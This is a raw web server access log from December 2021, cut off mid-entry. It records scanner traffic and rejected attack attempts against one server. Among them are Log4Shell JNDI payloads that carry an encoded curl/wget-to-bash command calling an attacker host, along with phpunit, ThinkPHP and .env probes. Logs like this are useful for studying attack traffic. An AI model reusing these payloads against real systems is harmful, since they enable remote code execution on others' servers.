- GET https newmail.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Dec/2021:11:41:20 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.118] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Dec/2021:12:52:32 +0000] 444 - GET https 64.22.31.253 "/UI/Dashboard" [Client 92.118.160.61] [Length 0] [Gzip -] "Go http package" "-" [26/Dec/2021:13:44:57 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:13:51:59 +0000] 444 - GET https agent.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Dec/2021:14:21:41 +0000] 444 - GET https 64.22.31.253 "/level/15/exec/-/sh/run/CR" [Client 89.248.160.193] [Length 0] [Gzip -] "libwww-perl/6.54" "-" [26/Dec/2021:14:50:58 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:14:50:58 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:14:50:58 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:15:59:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [26/Dec/2021:17:13:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.211.97] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Dec/2021:19:52:40 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:19:52:40 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:19:52:41 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Dec/2021:20:51:57 +0000] 444 - GET https srv.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Dec/2021:20:54:09 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:21:26:10 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=3_IBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 147.139.171.114] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [26/Dec/2021:21:26:11 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=qkoBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 147.139.171.114] [Length 0] [Gzip -] "python-httpx/0.19.0" "-" [26/Dec/2021:21:55:16 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:22:12:31 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 92.118.160.61] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Dec/2021:22:37:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.114] [Length 0] [Gzip -] "-" "-" [26/Dec/2021:22:37:54 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "-" "-" [26/Dec/2021:22:37:54 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [26/Dec/2021:22:54:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.43] [Length 0] [Gzip -] "-" "-" [26/Dec/2021:22:54:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.57] [Length 0] [Gzip -] "-" "-" [26/Dec/2021:22:54:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "-" "-" [26/Dec/2021:22:54:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "-" "-" [26/Dec/2021:22:55:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [26/Dec/2021:22:59:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.115] [Length 0] [Gzip -] "-" "-" [26/Dec/2021:22:59:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.115] [Length 252] [Gzip -] "-" "-" [26/Dec/2021:23:12:17 +0000] 444 - GET https komga.moralanimal.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Dec/2021:23:21:42 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [26/Dec/2021:23:46:07 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Dec/2021:23:56:51 +0000] 444 - GET https vmail.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [27/Dec/2021:00:17:28 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [27/Dec/2021:00:44:47 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:01:58:47 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0" "-" [27/Dec/2021:01:58:47 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36" "-" [27/Dec/2021:01:58:47 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [27/Dec/2021:02:12:00 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:02:55:39 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.212.223] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Dec/2021:03:01:02 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:03:15:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.221.0.3] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [27/Dec/2021:03:52:00 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:03:52:03 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:03:52:06 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:03:52:09 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:03:52:12 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:04:00:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:04:49:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:04:56:58 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [27/Dec/2021:04:58:55 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [27/Dec/2021:04:59:51 +0000] 444 - GET https mail8.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [27/Dec/2021:05:40:51 +0000] 444 - GET https tw.moralanimal.net "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [27/Dec/2021:05:45:00 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:05:45:03 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:05:45:06 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:05:45:10 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:05:45:13 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:05:59:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:06:01:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [27/Dec/2021:06:13:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:06:30:34 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [27/Dec/2021:07:53:36 +0000] 444 - GET https smtp.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [27/Dec/2021:08:26:26 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.50] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Dec/2021:08:34:54 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.208.240] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Dec/2021:08:45:41 +0000] 444 - GET https mail2.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [27/Dec/2021:11:43:44 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.209.137] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Dec/2021:12:59:09 +0000] 444 - GET https mx02.moralanimal.net "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [27/Dec/2021:13:42:02 +0000] 444 - GET https antispam.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [27/Dec/2021:13:54:04 +0000] 444 - GET https ns2.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [27/Dec/2021:14:20:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [27/Dec/2021:14:30:43 +0000] 400 - - http localhost "-" [Client 91.90.123.71] [Length 154] [Gzip -] "-" "-" [27/Dec/2021:15:21:42 +0000] 400 - GET http localhost "/" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [27/Dec/2021:15:30:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.78.39] [Length 252] [Gzip -] "Mozilla/5.0" "-" [27/Dec/2021:15:30:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.78.39] [Length 0] [Gzip -] "Mozilla/5.0" "-" [27/Dec/2021:15:37:30 +0000] 444 - GET https mailer.moralanimal.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [27/Dec/2021:16:00:25 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [27/Dec/2021:16:00:25 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [27/Dec/2021:16:43:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [27/Dec/2021:17:19:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.211.221] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Dec/2021:17:24:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.57] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:17:24:32 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "-" "-" [27/Dec/2021:17:24:32 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [27/Dec/2021:17:32:59 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:18:38:43 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:19:01:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.84] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:19:06:36 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:19:21:41 +0000] 444 - GET https 64.22.31.253 "/${jndi:ldap://121.140.99.236:1389/Exploit}" [Client 175.6.210.66] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [27/Dec/2021:19:21:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 175.6.210.66] [Length 0] [Gzip -] "${jndi:ldap://121.140.99.236:1389/Exploit}" "-" [27/Dec/2021:19:21:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 175.6.210.66] [Length 0] [Gzip -] "curl/7.58.0" "-" [27/Dec/2021:20:02:41 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Dec/2021:20:45:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.59] [Length 0] [Gzip -] "-" "-" [27/Dec/2021:20:45:02 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.59] [Length 252] [Gzip -] "-" "-" [27/Dec/2021:21:06:36 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [27/Dec/2021:21:39:02 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.212.10] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Dec/2021:21:39:53 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Dec/2021:21:39:53 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.10] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [27/Dec/2021:21:40:46 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.200.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Dec/2021:21:48:09 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:00:00:13 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:00:21:20 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.77.162.26] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [28/Dec/2021:00:30:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.189.111] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Dec/2021:00:56:01 +0000] 400 - - http localhost "-" [Client 45.9.20.57] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:01:09:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:01:37:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:01:38:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 111.28.189.51] [Length 0] [Gzip -] "curl/7.58.0" "-" [28/Dec/2021:01:38:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 111.28.189.51] [Length 0] [Gzip -] "curl/7.58.0" "-" [28/Dec/2021:01:38:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 111.28.189.51] [Length 0] [Gzip -] "curl/7.58.0" "-" [28/Dec/2021:01:38:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 111.28.189.51] [Length 0] [Gzip -] "curl/7.58.0" "-" [28/Dec/2021:02:30:43 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:02:34:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 209.141.58.146] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [28/Dec/2021:02:34:51 +0000] 400 - - http localhost "-" [Client 45.129.56.200] [Length 154] [Gzip -] "-" "-" [28/Dec/2021:02:35:01 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.100.242] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:02:35:02 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.100.242] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:02:35:27 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.129.56.200] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [28/Dec/2021:03:15:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Dec/2021:03:45:21 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 34.77.162.5] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [28/Dec/2021:03:56:56 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [28/Dec/2021:04:14:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.194] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:04:14:37 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "-" "-" [28/Dec/2021:04:14:37 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Dec/2021:05:52:22 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Dec/2021:06:34:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 170.130.187.38] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [28/Dec/2021:07:03:22 +0000] 444 - POST https 64.22.31.253 "/./RestAPI/LogonCustomization" [Client 45.146.165.168] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [28/Dec/2021:08:31:09 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.98] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Dec/2021:08:38:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 164.92.212.189] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [28/Dec/2021:08:40:13 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.197.83] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Dec/2021:09:24:16 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 36.37.185.94] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [28/Dec/2021:10:09:07 +0000] 444 - GET https komga.moralanimal.net "/" [Client 34.77.162.21] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [28/Dec/2021:11:12:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.114] [Length 0] [Gzip -] "-" "-" [28/Dec/2021:11:12:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "-" "-" [28/Dec/2021:11:12:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "Mozilla/5.0 